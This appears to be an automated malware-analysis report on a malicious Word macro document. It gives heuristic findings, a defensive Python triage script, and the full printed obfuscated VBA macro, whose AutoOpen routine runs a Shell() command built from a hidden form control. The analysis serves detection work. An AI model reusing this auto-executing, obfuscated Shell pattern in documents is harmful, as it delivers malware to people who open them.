Verdict: MALICIOUS
Risk score: 252
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1059 Command and Scripting Interpreter
T1204.002 Malicious File
The sample is a malicious OLE (Word) document containing a VBA macro. The macro defines an AutoOpen entry point, so it runs as soon as the document is opened with macros enabled, and its only meaningful action is a Shell() call; that pairing is a strong indicator of malicious intent. The command line passed to Shell() is assembled at runtime from an MSForms TextBox control (jzzfSMHbW.TextBox1) concatenated with other variables, so the actual command is not visible in the extracted VBA source; the cmd.exe heuristic and the p-code auto-exec finding indicate that it invokes cmd.exe with an execution flag, consistent with a downloader that fetches and runs a second-stage payload (the cmd.exe string itself presumably lives in the form control data rather than in the macro text). The rest of the macro is filler: arithmetic over variables that are never assigned (Sqr, Oct, CLng, CBool, ChrW), with On Error Resume Next suppressing the resulting errors, and the Shell call itself is split across bare line-continuation lines (Interaction _ ... .Shell) to defeat naive pattern matching. ClamAV independently flags the container as Doc.Dropper.Generic-6781662-0.
Heuristics (9)

- ClamAV: Doc.Dropper.Generic-6781662-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Dropper.Generic-6781662-0.
- VBA macros detected (medium, OLE_VBA_MACROS, 3 related findings): the document contains VBA macro code.
- Potential Shell call in VBA (critical, OLE_VBA_SHELL). Matched line in script: `_ .Shell(nmEhbsbpl, BARBB), hYuYm) Set jLTUEGQFqnOsqIdi = wlhFwnwzMdXcXi`
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): the compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This rule catches p-code-only macro documents, and documents where source extraction fails, so the finding does not depend on the visible source.
- AutoOpen macro (low, OLE_VBA_AUTOOPEN). Matched line in script: `Attribute VB_Control = "TextBox1, 0, 0, MSForms, TextBox" Sub autoopen() owCWJQZV`
- Suspicious cmd.exe invocation with execution flag (high, SC_STR_CMD).
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): the OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence of the old Word macro execution surface, not a downloader or parser-CVE attribution by itself. Note that this rule's description is contradicted by the extracted artifact below: olevba did recover a VBA project (macros.bas) containing the AutoOpen routine, so treat this finding as redundant with OLE_VBA_AUTOOPEN rather than as evidence of a separate WordBasic macro.
- Suspicious extracted artifact (info, EXTRACTED_FILE_STATIC_TRIAGE): one or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL (info, EMBEDDED_URL): one or more URLs were extracted from the document. The URL itself is not a detection; the per-URL label says which channel (macro, JS, link annotation, document body, ...) reached it. URL: http://schemas.openxmlformats.org/drawingml/2006/main, found in document text (OLE body). This is the DrawingML XML namespace identifier present in any Office document carrying drawing markup, not a host the macro contacts, and should not be treated as a network indicator.
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 7618 bytes | ee1aece739d536c9260ed47e1521fba1cd295842dbbe8f8f030d5b46c03c51d1 |

Detection for macros.bas:

- ClamAV: No threats found (the Doc.Dropper.Generic signature above fires on the OLE container, not on the decoded macro text).
- Obfuscation or payload: likely. 208 of 243 identifiers look randomly generated (e.g. 'JIjGsUzhVUKAGLVSbFGVjKtG'), consistent with name-mangling obfuscation.
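As an added example (not the analyzer's or oletools' own code), the following Python reproduces the checks this report rests on, run over a constructed excerpt of the extracted macro: it rejoins the `_`-continued lines so the split `Interaction _ ... .Shell` becomes a single `Interaction.Shell(...)` statement, finds the AutoOpen entry point and the Shell call, traces the Shell argument back to its assignment to show the command is built from an MSForms TextBox rather than from a visible string, and scores identifiers with a crude consonant-run heuristic standing in for whatever the analyzer uses to arrive at its 208-of-243 figure. The excerpt, the keyword list, the control-property list and the randomness thresholds are assumptions made for the example.

```python
"""Static triage of an extracted VBA macro: auto-exec entry points, Shell()
calls hidden behind line continuations, where the Shell command string is
assembled from, and a crude name-mangling score. Added example, not the
analyzer's own code; thresholds and word lists are assumptions."""
import re
from typing import Dict, List, Tuple

# Constructed excerpt modelled on the extracted macros.bas above (trimmed to
# the lines that matter; same "Interaction _ / _ / .Shell" continuation trick).
SAMPLE_VBA = '''Attribute VB_Name = "jzzfSMHbW"
Attribute VB_Control = "TextBox1, 0, 0, MSForms, TextBox"
Sub autoopen()
owCWJQZV
End Sub
Function owCWJQZV()
On Error Resume Next
Const BARBB = 0
nmEhbsbpl = jzzfSMHbW.TextBox1 + nirCnwnM + rFKdWti
wZIlTLDl = Array(nAVvF, qcklYKjv, Interaction _
_
_
.Shell(nmEhbsbpl, BARBB), hYuYm)
End Function
'''

AUTOEXEC_RE = re.compile(
    r"^\s*(?:Public\s+|Private\s+)?Sub\s+(AutoOpen|Auto_Open|AutoExec|AutoClose"
    r"|AutoExit|Document_Open|Workbook_Open)\b", re.I)
SHELL_RE = re.compile(
    r"\b(?:Interaction\.)?Shell\s*\(|\bCreateObject\s*\(\s*\"(?:WScript\.Shell"
    r"|Shell\.Application)\"", re.I)
# MSForms control properties that macros use to stash a command string outside
# the VBA source (the sample reads jzzfSMHbW.TextBox1). Assumed list.
FORM_PROP_RE = re.compile(r"\.(TextBox\d*|Label\d*|Caption|Tag|ControlTipText)\b", re.I)
VBA_KEYWORDS = {  # assumed, enough for the excerpt
    "sub", "end", "function", "on", "error", "resume", "next", "const", "set",
    "dim", "as", "if", "then", "else", "elseif", "for", "to", "each", "in",
    "call", "exit", "true", "false", "nothing", "public", "private", "with",
    "do", "loop", "while", "wend", "goto", "new", "and", "or", "not", "is",
    "array", "interaction", "shell", "createobject", "chrw", "chr", "sqr",
    "oct", "clng", "cbool", "integer", "long", "string", "object", "variant",
}


def join_continuations(src: str) -> List[str]:
    """Re-join logical lines split with VBA's ' _' continuation marker.
    The sample pads the split with bare '_' lines, so both forms are accepted,
    and whitespace before '.' is dropped so 'Interaction _ ... .Shell' reads
    as 'Interaction.Shell'."""
    stmts, buf = [], ""
    for raw in src.splitlines():
        line = raw.rstrip()
        if line == "_" or line.endswith(" _"):
            buf += line[:-1]
            continue
        stmts.append(re.sub(r"\s+\.", ".", buf + line).strip())
        buf = ""
    if buf:
        stmts.append(re.sub(r"\s+\.", ".", buf).strip())
    return stmts


def looks_random(name: str) -> bool:
    """Crude name-mangling test (assumed thresholds): 7+ chars containing a
    run of 4+ consonants, e.g. 'nmEhbsbpl' or 'qcklYKjv', not 'Document_Open'."""
    best = run = 0
    for ch in name:
        run = run + 1 if ch.isalpha() and ch.lower() not in "aeiou" else 0
        best = max(best, run)
    return len(name) >= 7 and best >= 4


def identifier_stats(src: str) -> Tuple[int, int]:
    """Return (random-looking, total) over unique non-keyword identifiers,
    ignoring module Attribute lines and string literals."""
    code = "\n".join(l for l in src.splitlines()
                     if not l.lstrip().lower().startswith("attribute "))
    code = re.sub(r'"[^"]*"', '""', code)
    names: List[str] = []
    for name in re.findall(r"\b[A-Za-z][A-Za-z0-9_]*\b", code):
        if name.lower() not in VBA_KEYWORDS and name not in names:
            names.append(name)
    return sum(looks_random(n) for n in names), len(names)


def triage(src: str) -> Dict[str, object]:
    stmts = join_continuations(src)
    autoexec = [m.group(1) for m in map(AUTOEXEC_RE.match, stmts) if m]
    shell_calls = [s for s in stmts if SHELL_RE.search(s)]
    # Trace the first Shell() argument back to its assignment(s) so the analyst
    # can see whether the command is a literal or is built from form data.
    sources: Dict[str, List[str]] = {}
    for stmt in shell_calls:
        m = SHELL_RE.search(stmt)
        arg = re.match(r"\s*([A-Za-z][A-Za-z0-9_]*)", stmt[m.end():])
        if stmt[m.end() - 1] != "(" or not arg:
            continue
        pat = re.compile(r"\s*%s\s*=\s*(.+)$" % re.escape(arg.group(1)))
        sources[arg.group(1)] = [a.group(1) for a in map(pat.match, stmts) if a]
    in_form = any(FORM_PROP_RE.search(r) for rs in sources.values() for r in rs)
    rnd, total = identifier_stats(src)
    return {
        "autoexec": autoexec,
        "shell_calls": shell_calls,
        "shell_arg_sources": sources,
        "command_in_form_control": in_form,
        "random_identifiers": rnd,
        "identifiers": total,
        "verdict": "suspicious" if autoexec and shell_calls else "no auto-exec+shell pair",
    }


if __name__ == "__main__":
    for key, value in triage(SAMPLE_VBA).items():
        print(f"{key}: {value}")
```

The practical consequence for triage is the `command_in_form_control` result: the string handed to Shell() is not in the macro text at all but in the document's UserForm control data, so the cmd.exe command line (and any download URL) has to be recovered from the form storage, which recent olevba versions list as form strings, rather than from macros.bas.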
Preview script (first 1,000 lines of the extracted script)
Attribute VB_Name = "jzzfSMHbW"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "TextBox1, 0, 0, MSForms, TextBox"
Sub autoopen()
owCWJQZV
End Sub
Attribute VB_Name = "CZAdYStUvHX"
Function owCWJQZV()
On Error Resume Next
Set wQrdECuuScTYSIqOWOpit = HiNiiOXUzBTisNFYh
RDzXIKNGPwVIJPr = Sqr(JIQWUfXwiSFjPdJzhfRqT)
ZCUczazprErLEwHLplfzs = 280710177 * Oct(dqlnXbiwAOZjOBr) * 213645632 * wpaAsEZNpWqfKUrjwrlNncON - (39958568 + CLng(ziNtJzFiADQElmLZhFnSqti) * 928227 * CBool(116453494))
GSJWbNuBGuAwNsZc = ChrW(nSrGwCNuJZnADwMbwr)
Set NDfZjJmonvbHBwGGpADLUhsC = ztAbjosPzLtdljMIuwFWhtC
NiAjhcfKdijPlMEGjsCkN = Sqr(DUrCainfNDqONEoMiWfi)
HwzWhuznorSYkajpiCzXwQjY = 153279644 * Oct(zRXKfEidwXufsonrYLYpdiHX) * 25527025 * iLBqQYziuhQiLOuHdJ - (309760068 + CLng(JIjGsUzhVUKAGLVSbFGVjKtG) * 182656867 * CBool(302434869))
KvWBwbEKabuwwY = ChrW(NZXPYzsbfXCZSzOdi)
Set iCfBtjWcBJPChcTmQdsFJi = RsiofISAINOYwHSVSQbpB
foqRBtolocvTOJ = Sqr(uqTjJGpTDWfzIapi)
jQMtwNHYMWYmccsIJXZIGst = 276566882 * Oct(muWvjLzuDmzzSvcLKw) * 238065845 * jaumowCPZmoXWXMTl - (189984258 + CLng(LZrZpuLrcwwvwJZoLAjG) * 221043452 * CBool(55948043))
UQwaaujJahPYrpBErdHaS = ChrW(rsNzjASBWzCpXJrUlwsn)
Set lAGiwHjSrLLiiatrJVSZjiN = tiPMoVTqifBMjWvXhwkQwL
cLdTJInMCmRpSsUiWrVwDYj = Sqr(mausiwwqhjnAKCK)
vSwZShcfMTOYdPrDiVjjO = 305211060 * Oct(EpaHiETTThoBkZGpFzPj) * 94767448 * YMSsjWoVbTAnukratasAu - (284365274 + CLng(OGdXjblwNQUROoqVziwGVA) * 322118673 * CBool(208728423))
ziEpnOpjXEmFwIuqUm = ChrW(ZSdlDEuVwkUOJwBiwj)
Set GWwoSRPYSbwnPzqYw = nIAfttmvOokZvDWGWN
RvDijwQmwIpWqVR = Sqr(AObdDCXCaosjsQJbcQ)
bjZQjcGomZRuEijWsvkE = 103489344 * Oct(BIvGkthzNuZrpkbzuBw) * 92921625 * cItoCJuRjsLODiRUasMGm - (79647834 + CLng(UMozuuAjIBnYzBSikn) * 228786871 * CBool(219507374))
OclBJcUJjHwQlZ = ChrW(NKzWfJDNQJSTIJcTDiV)
Set vzCPPihSjVmPzmkv = kMcrUPTrAfmHbQiaXjKbwNl
XnoGJVluoqXwIS = Sqr(hiXOzuLHEDpcCaUwWba)
hbNifusSksmRFIcsYz = 245394507 * Oct(MfjCUsiUTsBUiwt) * 36849839 * pjFCsWLRXWuzcZWqSH - (11138488 + CLng(KNmLYzsrRjHPXXjQfETIXlz) * 146042906 * CBool(263143660))
rSiiPqrNKbwtisiUAo = ChrW(faFqFKNosVZQQXBIZ)
Const BARBB = 0
Set HpwhplJNQNzsWJG = zAAJnAniRGlGhbcWC
iFPftnkoGDJVFCHvIX = Sqr(MRGBQPizCfokcpCbBBUG)
ZztkZvBizmSErpCb = 22696817 * Oct(PKniIRSjfCaFtoQRnSMRqThR) * 17108925 * VfkzAzzBEwarqcSsQwHtsin - (173772217 + CLng(jOmJvcVfPwmvfC) * 178383077 * CBool(52913345))
jUqwckzzDjJIArrKzRkLsJU = ChrW(LaffzkvjlAuTjG)
Set frccuUhFuHUaRF = WzIzJMZHDJfwspmSuKDIDJn
WdHUwdIONifGiRfqGkZ = Sqr(PYpQHpaQNwqNKjdjFE)
ZARiKJjkdfMBTjTJ = 326662133 * Oct(qMHDsAQrSvznzlBZASzqiG) * 180923614 * wlBvXdrZjsOsCV - (57111215 + CLng(RSqklpjaztjBMHJkl) * 20152202 * CBool(48210301))
zVTpEZHGXJWiJjY = ChrW(PrTGEaviuqNYidHz)
Set SJYuwqikoRdmizcDdUE = FWsWJpvSMBJjGRhKvCZOv
WGbwRPfTjXWCSwRBkGuMX = Sqr(ItfQSSHbuqmWAmuNYjmtVl)
EzktuRSUiLjwiQAz = 88080178 * Oct(EcjQvwfHXiOaiRWj) * 179976373 * hZNJbVDLRnMzXjYhQ - (59564774 + CLng(oDoOmtkFIjRbBoiPnzvA) * 68773519 * CBool(84745249))
frvaKiBwBNAmOtLbPrQui = ChrW(MLIpTkjUIWbTIWrTZbHjQOAC)
Set WkIWqYmomjqFfLzjZMAOIAr = CBhHwcvPZwYwpnP
KTaFIWiCfLhoDBiWtCTpqirJ = Sqr(bjimwrmzDDoZmwjXfclvHL)
OBFnTaFjcRRjqvPjUv = 282547079 * Oct(wtzGDnRLCGNfPI) * 131210778 * sDSWzWMIURqcPvRARLZVE - (332836221 + CLng(jIuiWDlQhbioQcUCbhomm) * 323136653 * CBool(271983746))
GoNOEjwjuUlODsqEiAIAlHBX = ChrW(IwnPMzjTwXhpWMwcztwrGzir)
Set sNUGKTHhDjRGFfqRMO = kDBGfNHWiIsNzUDt
XkqzARhjFiVaYaqRWXSrG = Sqr(tDwdYKWRmBlFtcXOjmUaZf)
vFhBvdwkCdirmAXsWKnwU = 275341250 * Oct(hOuHnjWjPORBXqJbo) * 271789047 * icLkkOMtwQljRGnAm - (8334024 + CLng(JEjzSdUzzBMjzGDHpW) * 196630798 * CBool(59655813))
amYPdfAukqWZSjMCfsHPONs = ChrW(hmcNwziIsbiRHhowUEPLq)
Set jLZpLuNiVrzdRWljJ = lVOlZLGPRwPOGXzFHCf
fPBOKRNRNQmKqifrEumNivc = Sqr(TGkajLPjDSvWUzbHw)
CAKEYcrFBNQRJjnkvDjmkB = 9729067 * Oct(GYiJXESiPstbGO) * 224220323 * ibKCTlJLjjEXaLE - (8244200 + CLng(HwztihwulCQqLdhVYEJqzjUP) * 152139204 * CBool(171105132))
AuDDorcwPiOzuNHhjsVXFX = ChrW(CHvKzYdkWItwzi)
nmEhbsbpl = jzzfSMHbW.TextBox1 + nirCnwnM + rFKdWti + qzuuzDJ + zhvXG + smAmzw + cbpcwKNZ + TwzvhH + UQMsKkBR
Set sihsmnjBjfsGkoqGizN = MZfMUWYTLcKBwpQmhLZwUnE
wZuhPjrOUlMSCVX = Sqr(ONqDUqIuYEYTaQYZV)
PubqDblvjNdwjMnJhGz = 3165304 * Oct(FRAJKLYoEMmwiFdnYKOSYK) * 309407234 * ZUMfRiScVkJcbhsQM - (49922150 + CLng(BqBEGJVJwihOvWjjqwsW) * 141544640 * CBool(304490910))
buwAMqRwGRhtaYPF = ChrW(wYVtnWNGszCRTkHGja)
Set hEizqYdEwutMCXjkzOAw = jjoknbmCGLlWjZVl
zRNhlbptwrDGwkzpUAUpMCzr = Sqr(riHqVwOwBQikcv)
zrrjivIamjMYAvl = 313918327 * Oct(WfushDatpHzUQEsEMq) * 140671586 * NIGjIVJJZNCPUNOw - (6393976 + CLng(RoQqtnKFVcTToFQkH) * 93680435 * CBool(165296667))
jLtRTbFizCqvEwZj = ChrW(XOSYCAhpFYzzkGAXpjFvwWR)
Set aZqsBcaMcufsOBb = diSRkMbwHjEGNSkfDHWX
cvBQDYXwGouastZuaX = Sqr(wtkVXTwJKAoGfDMA)
RBjoEABsKjUZKkdjIZZsa = 198839566 * Oct(EOMvRhPWjsqdZrZttjcNmikz) * 103998388 * WWimIJmFcZrEjKuK - (265807065 + CLng(TGDsijfIzQJaiNjGKsst) * 234001145 * CBool(216694674))
UPABpzRScpDfJHiowHAMWvB = ChrW(iYdACSuznPjdhiqJfwhkahW)
Set TcrVckAjRZMzKtVzw = uRCVYzzKHcSKKfBZsQYiwDAM
aMkDZclTzkIMwErYRcYO = Sqr(OjzlAEZQzqQprwm)
HizhrNvsMuMjKhbb = 331553543 * Oct(LjmSYYMDztsWGFFKJt) * 169070722 * PBlEZGrsFQPorUmGapJaV - (263057495 + CLng(CApnHbzXhCRGKvhs) * 122454397 * CBool(214443563))
zjdDflSwjUkzMboiDj = ChrW(kRGtimaOcLtwruBqd)
Set iXIObtrWwBBcMzujCXpldRK = XpSUZpGKRZCYriHCEL
PoDFSAnwtNNPRNlqlbWwHvrL = Sqr(uVrTQnjSSuiUkzUlrNwDJk)
GsVahOrUzrSXivid = 174669355 * Oct(zzTCWBcCKPhuIcJLlbuM) * 336142116 * bZlcRbpqMkWWMl - (286345365 + CLng(VTwfDbmDjpNTKC) * 229402256 * CBool(91942541))
tXtRtkAMUDzYlQYTiGaOT = ChrW(znhtbOWjKBIoSO)
Set mOhWqUodafwaVsnwKwk = PszSmmsawNkiMrESqra
JXDoBwnVizzTsi = Sqr(uRPkEcNiMvSOdnV)
SWkProIQowWwANQ = 249422836 * Oct(iJBbHWYwtqsijJhIrjzI) * 124387936 * GIwwFFRdzfjkviTfL - (340087766 + CLng(TwzQhEponJjTdKQD) * 298711286 * CBool(185829084))
RSfPrNCzNDoLVzwz = ChrW(IrRsQRdUSLDZfaaDAi)
Set jiODPpXMRbBpdzSVkvs = XmHoWvJwlnWhhbiYBjMNKqt
cduhifiPuGAtbZjUf = Sqr(adFTHBSuTAjfjhtsLtA)
SGJGmbblzbDrhjQQJJW = 297691579 * Oct(kLdjOaTAiNnTDJTTw) * 215139196 * ZhzswrwzQciCWHNivjZY - (7980348 + CLng(lONQYdZzwKcqThm) * 123648863 * CBool(218010107))
QcCXALQMqbYnZIiQvjijTV = ChrW(TjXafnfvczkHYGNNCz)
Set lnbPpaPCoQopNNVzK = riGczjQjGnJqWPFiLRUzzi
HXJKoWYGamWTzJJprwF = Sqr(ctwtZkiBDcNpMIwEoZ)
NhjiEAwFVCccwsJzOZPl = 24454654 * Oct(WDwYjGrLFBSWsnwKtsdiNz) * 176477901 * OzCKjfYnYZKdkf - (135270120 + CLng(OKzbJcAWBDfWHZZXcwKiDj) * 180014462 * CBool(169033189))
izSdTaOYnPDCzqlzjJjz = ChrW(fzznAmVlliiXzf)
wZIlTLDl = Array(nAVvF, qcklYKjv, oAGKiVch, Interaction _
_
_
_
_
_
_
_
.Shell(nmEhbsbpl, BARBB), hYuYm)
Set jLTUEGQFqnOsqIdi = wlhFwnwzMdXcXi
EtzAAtIaYMzqDvajc = Sqr(YpBGEnXWUsdtcTJw)
wJdiHqLJtwwtEmwuRzoPwo = 78655757 * Oct(dZQwfjjhGHdXzjQzpwL) * 281934946 * dPGjwLTUjpIzBBhaPdJ - (105956988 + CLng(mzIZukipZBdVAzKJQ) * 214356414 * CBool(161656131))
NaRUawfiYaTBaNrS = ChrW(HDalfGofcACXQzzlDBLfnwwF)
End Function